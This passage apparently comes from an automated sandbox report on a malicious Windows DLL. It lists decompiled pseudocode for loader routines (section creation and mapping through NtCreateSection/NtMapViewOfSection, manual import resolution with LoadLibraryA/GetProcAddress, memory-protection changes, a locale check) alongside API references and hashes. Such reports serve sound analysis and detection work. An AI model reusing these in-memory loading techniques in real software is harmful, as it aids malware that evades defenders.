                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00001000,00000004,6E2823A2), ref: 6E282679
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2), ref: 6E282746
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2,?), ref: 6E28279C
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2827B8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.473316269.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                                                                                                              • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction ID: 4b26e144eb0f30125ca8cf8778d3c913a39bd59d814e1bc44f7fea5d4559b8e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD1A1762002869FDF05CF54C880F5277A6FF48710B0A45A4EE0AAF79BE771B854DB62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                                              			E6E2018D1(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                                              				int _v44;
                                                                                                                                                                                                                                                              				void* _v48;
                                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                                              				long _t34;
                                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t48 = __eax;
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                                                                              				_v48 = 0x18;
                                                                                                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                                                                                                              				_v36 = 0x40;
                                                                                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                                                                              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                                              				if(_t34 < 0) {
                                                                                                                                                                                                                                                              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					 *_t48 = _v16;
                                                                                                                                                                                                                                                              					_t39 = E6E201B89(_t48,  &_v12); // executed
                                                                                                                                                                                                                                                              					_t47 = _t39;
                                                                                                                                                                                                                                                              					if(_t47 != 0) {
                                                                                                                                                                                                                                                              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                                              						 *_a4 = _v12;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t47;
                                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                                              0x6e2018da
                                                                                                                                                                                                                                                              0x6e2018e1
                                                                                                                                                                                                                                                              0x6e2018e2
                                                                                                                                                                                                                                                              0x6e2018e3
                                                                                                                                                                                                                                                              0x6e2018e4
                                                                                                                                                                                                                                                              0x6e2018e5
                                                                                                                                                                                                                                                              0x6e2018f6
                                                                                                                                                                                                                                                              0x6e2018fa
                                                                                                                                                                                                                                                              0x6e20190e
                                                                                                                                                                                                                                                              0x6e201911
                                                                                                                                                                                                                                                              0x6e201914
                                                                                                                                                                                                                                                              0x6e20191b
                                                                                                                                                                                                                                                              0x6e20191e
                                                                                                                                                                                                                                                              0x6e201925
                                                                                                                                                                                                                                                              0x6e201928
                                                                                                                                                                                                                                                              0x6e20192b
                                                                                                                                                                                                                                                              0x6e20192e
                                                                                                                                                                                                                                                              0x6e201933
                                                                                                                                                                                                                                                              0x6e20196e
                                                                                                                                                                                                                                                              0x6e201935
                                                                                                                                                                                                                                                              0x6e201938
                                                                                                                                                                                                                                                              0x6e20193e
                                                                                                                                                                                                                                                              0x6e201943
                                                                                                                                                                                                                                                              0x6e201947
                                                                                                                                                                                                                                                              0x6e201965
                                                                                                                                                                                                                                                              0x6e201949
                                                                                                                                                                                                                                                              0x6e201950
                                                                                                                                                                                                                                                              0x6e20195e
                                                                                                                                                                                                                                                              0x6e20195e
                                                                                                                                                                                                                                                              0x6e201947
                                                                                                                                                                                                                                                              0x6e201976

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E20192E
                                                                                                                                                                                                                                                                • Part of subcall function 6E201B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E201943,00000002,00000000,?,?,00000000,?,?,6E201943,00000000), ref: 6E201BB6
                                                                                                                                                                                                                                                              • memset.NTDLL ref: 6E201950
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                                                                                                              • Instruction ID: b023b727a5dc4af52bf0b3ae2f261b0f0de8243a40d7aa1f6251d2464b044147
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3221E7B590020DAFDB018FA9C8849DEFBB9EF48354F108829E505B7250D730AA488BA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                                                                                              			E6E201566(void* __ecx) {
                                                                                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                                                                                              				signed short _t7;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                              				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                                              					__imp__GetSystemDefaultUILanguage();
                                                                                                                                                                                                                                                              					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                                              0x6e20156a
                                                                                                                                                                                                                                                              0x6e20157b
                                                                                                                                                                                                                                                              0x6e201583
                                                                                                                                                                                                                                                              0x6e201585
                                                                                                                                                                                                                                                              0x6e201598
                                                                                                                                                                                                                                                              0x6e201598
                                                                                                                                                                                                                                                              0x6e2015a2

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E201C5E,?,6E201810,?,00000000,00000000,?,?,?,6E201810), ref: 6E20157B
                                                                                                                                                                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,6E201C5E,?,6E201810,?,00000000,00000000,?,?,?,6E201810), ref: 6E201585
                                                                                                                                                                                                                                                              • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E201C5E,?,6E201810,?,00000000,00000000,?,?,?,6E201810), ref: 6E201598
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3724080410-0
                                                                                                                                                                                                                                                              • Opcode ID: 80ea05e18e8fdc51717a34e07be10a48d13fd15e72fd51f3dfa50ab6927ba4eb
                                                                                                                                                                                                                                                              • Instruction ID: fa5554fa72f2b33b520da13f48decc4e87006664ca0ea59f541f86260f21df87
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80ea05e18e8fdc51717a34e07be10a48d13fd15e72fd51f3dfa50ab6927ba4eb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E04FB8640249BBEB00E7E19C0AFBD73BDAB0070AF500088FB01E60C0D6B49B08E735
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: U$w
                                                                                                                                                                                                                                                              • API String ID: 0-2864656496
                                                                                                                                                                                                                                                              • Opcode ID: 78933f4ccb0a4fef533be152efe26dd090beb70bb1b47d8a9887a7bca130745f
                                                                                                                                                                                                                                                              • Instruction ID: 6bd7f608d905163072910460cbba38a90ef6cb0a70111b10d8c625bb1415aa57
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78933f4ccb0a4fef533be152efe26dd090beb70bb1b47d8a9887a7bca130745f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18A290719497598FE749CF6CC894A5BBBE3AB8B304F04462EE4D487391E3B4990CCB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E201F31(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                                              				intOrPtr* _v12;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                                              				signed short _v24;
                                                                                                                                                                                                                                                              				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                                                                                              				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                                              				intOrPtr* _t49;
                                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                                              				signed short _t51;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                                              				intOrPtr _t65;
                                                                                                                                                                                                                                                              				signed int _t68;
                                                                                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                                              				signed short* _t73;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t69 = __edi;
                                                                                                                                                                                                                                                              				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                                              				_t59 =  *0x6e2041cc;
                                                                                                                                                                                                                                                              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                                                                                                                                                              				if(_t43 != 0) {
                                                                                                                                                                                                                                                              					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                                              					_v12 = _t45;
                                                                                                                                                                                                                                                              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                              					if(_t46 != 0) {
                                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                                              							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                                              							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                                              							_v28 = _t47;
                                                                                                                                                                                                                                                              							if(_t47 == 0) {
                                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                              							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                              							_t49 = _v12;
                                                                                                                                                                                                                                                              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                                              							_t50 =  *_t49;
                                                                                                                                                                                                                                                              							if(_t50 != 0) {
                                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                                              								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                                              								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                                                                              									_t51 =  *_t73;
                                                                                                                                                                                                                                                              									if(_t51 == 0) {
                                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									if(__eflags < 0) {
                                                                                                                                                                                                                                                              										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                                              										if(_t51 < _t69) {
                                                                                                                                                                                                                                                              											L12:
                                                                                                                                                                                                                                                              											_t21 =  &_v8;
                                                                                                                                                                                                                                                              											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                              											__eflags =  *_t21;
                                                                                                                                                                                                                                                              											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                                              											_t65 = _a4;
                                                                                                                                                                                                                                                              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                                              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                                              												goto L12;
                                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                                              												goto L11;
                                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                                              										_v8 = _t51;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t53 = _v8;
                                                                                                                                                                                                                                                              									__eflags = _t53;
                                                                                                                                                                                                                                                              									if(_t53 == 0) {
                                                                                                                                                                                                                                                              										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										_t54 = _t53 + 2;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                                              									__eflags = _t55;
                                                                                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                                                                                              										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										_t68 = _v8;
                                                                                                                                                                                                                                                              										__eflags = _t68;
                                                                                                                                                                                                                                                              										if(_t68 != 0) {
                                                                                                                                                                                                                                                              											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                                              										 *_v16 = _t55;
                                                                                                                                                                                                                                                              										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                                                                                                              										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                                              										_t32 =  &_v16;
                                                                                                                                                                                                                                                              										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                                              										__eflags =  *_t32;
                                                                                                                                                                                                                                                              										continue;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								_t50 = _t61;
                                                                                                                                                                                                                                                              								if(_t61 != 0) {
                                                                                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                                              							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                                              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                                              							if(_t46 != 0) {
                                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							L26:
                                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                                                                                                              						__eflags = _t60;
                                                                                                                                                                                                                                                              						_v20 = _t60;
                                                                                                                                                                                                                                                              						goto L26;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				L27:
                                                                                                                                                                                                                                                              				return _v20;
                                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                                              0x6e201f31
                                                                                                                                                                                                                                                              0x6e201f3a
                                                                                                                                                                                                                                                              0x6e201f3f
                                                                                                                                                                                                                                                              0x6e201f45
                                                                                                                                                                                                                                                              0x6e201f4e
                                                                                                                                                                                                                                                              0x6e201f54
                                                                                                                                                                                                                                                              0x6e201f56
                                                                                                                                                                                                                                                              0x6e201f59
                                                                                                                                                                                                                                                              0x6e201f5e
                                                                                                                                                                                                                                                              0x6e201f65
                                                                                                                                                                                                                                                              0x6e201f65
                                                                                                                                                                                                                                                              0x6e201f69
                                                                                                                                                                                                                                                              0x6e201f71
                                                                                                                                                                                                                                                              0x6e201f74
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201f7a
                                                                                                                                                                                                                                                              0x6e201f84
                                                                                                                                                                                                                                                              0x6e201f86
                                                                                                                                                                                                                                                              0x6e201f89
                                                                                                                                                                                                                                                              0x6e201f8c
                                                                                                                                                                                                                                                              0x6e201f90
                                                                                                                                                                                                                                                              0x6e201f98
                                                                                                                                                                                                                                                              0x6e201f9a
                                                                                                                                                                                                                                                              0x6e201f9d
                                                                                                                                                                                                                                                              0x6e202005
                                                                                                                                                                                                                                                              0x6e202005
                                                                                                                                                                                                                                                              0x6e202009
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201fa2
                                                                                                                                                                                                                                                              0x6e201fa8
                                                                                                                                                                                                                                                              0x6e201faa
                                                                                                                                                                                                                                                              0x6e201fbd
                                                                                                                                                                                                                                                              0x6e201fc0
                                                                                                                                                                                                                                                              0x6e201fc0
                                                                                                                                                                                                                                                              0x6e201fc0
                                                                                                                                                                                                                                                              0x6e201fc4
                                                                                                                                                                                                                                                              0x6e201fac
                                                                                                                                                                                                                                                              0x6e201fac
                                                                                                                                                                                                                                                              0x6e201fb4
                                                                                                                                                                                                                                                              0x6e201fb6
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201fb6
                                                                                                                                                                                                                                                              0x6e201fa4
                                                                                                                                                                                                                                                              0x6e201fa4
                                                                                                                                                                                                                                                              0x6e201fb8
                                                                                                                                                                                                                                                              0x6e201fb8
                                                                                                                                                                                                                                                              0x6e201fb8
                                                                                                                                                                                                                                                              0x6e201fc7
                                                                                                                                                                                                                                                              0x6e201fca
                                                                                                                                                                                                                                                              0x6e201fcc
                                                                                                                                                                                                                                                              0x6e201fd3
                                                                                                                                                                                                                                                              0x6e201fce
                                                                                                                                                                                                                                                              0x6e201fce
                                                                                                                                                                                                                                                              0x6e201fce
                                                                                                                                                                                                                                                              0x6e201fdb
                                                                                                                                                                                                                                                              0x6e201fe1
                                                                                                                                                                                                                                                              0x6e201fe3
                                                                                                                                                                                                                                                              0x6e202013
                                                                                                                                                                                                                                                              0x6e201fe5
                                                                                                                                                                                                                                                              0x6e201fe5
                                                                                                                                                                                                                                                              0x6e201fe8
                                                                                                                                                                                                                                                              0x6e201fea
                                                                                                                                                                                                                                                              0x6e201ff2
                                                                                                                                                                                                                                                              0x6e201ff2
                                                                                                                                                                                                                                                              0x6e201ff7
                                                                                                                                                                                                                                                              0x6e201ff9
                                                                                                                                                                                                                                                              0x6e202000
                                                                                                                                                                                                                                                              0x6e202002
                                                                                                                                                                                                                                                              0x6e202002
                                                                                                                                                                                                                                                              0x6e202002
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202002
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201fe3
                                                                                                                                                                                                                                                              0x6e201f92
                                                                                                                                                                                                                                                              0x6e201f94
                                                                                                                                                                                                                                                              0x6e201f96
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201f96
                                                                                                                                                                                                                                                              0x6e202016
                                                                                                                                                                                                                                                              0x6e202016
                                                                                                                                                                                                                                                              0x6e20201d
                                                                                                                                                                                                                                                              0x6e202022
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202028
                                                                                                                                                                                                                                                              0x6e202033
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202033
                                                                                                                                                                                                                                                              0x6e20202a
                                                                                                                                                                                                                                                              0x6e20202a
                                                                                                                                                                                                                                                              0x6e202030
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202030
                                                                                                                                                                                                                                                              0x6e201f5e
                                                                                                                                                                                                                                                              0x6e202034
                                                                                                                                                                                                                                                              0x6e202039

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E201F69
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 6E201FDB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2574300362-0
                                                                                                                                                                                                                                                              • Opcode ID: c38104f899cbcae74314e85346c2967aa6ac465e0fe63c6e8158364d468d5fe5
                                                                                                                                                                                                                                                              • Instruction ID: 6f735098157e35ace198f1e0aa29058932b53926bbdcf67d197cbfc56f747493
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c38104f899cbcae74314e85346c2967aa6ac465e0fe63c6e8158364d468d5fe5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54313BB1A0030ADFDB44CF99C884BAEB7FABF55349F10406AD811E7281E770DA44CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                                                              			E6E201B89(void** __esi, PVOID* _a4) {
                                                                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                                                                              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                                                                                                              				if(_t13 < 0) {
                                                                                                                                                                                                                                                              					_push(_t13);
                                                                                                                                                                                                                                                              					return __esi[6]();
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                                              0x6e201b9b
                                                                                                                                                                                                                                                              0x6e201ba1
                                                                                                                                                                                                                                                              0x6e201baf
                                                                                                                                                                                                                                                              0x6e201bb6
                                                                                                                                                                                                                                                              0x6e201bbb
                                                                                                                                                                                                                                                              0x6e201bc1
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201bc2
                                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E201943,00000002,00000000,?,?,00000000,?,?,6E201943,00000000), ref: 6E201BB6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: SectionView
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                                                                                                                                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                              • Instruction ID: be57ff73195df287c3240f958baef3adc633fa11b8c06b7743cc0bcc9a56f06f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F012B590020CFFEB119FA5CC85C9FBBFDEB44354B104939B552E2090E6309E499B60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                                                                                                              			E6E201979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                                                                              				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                              				short _v60;
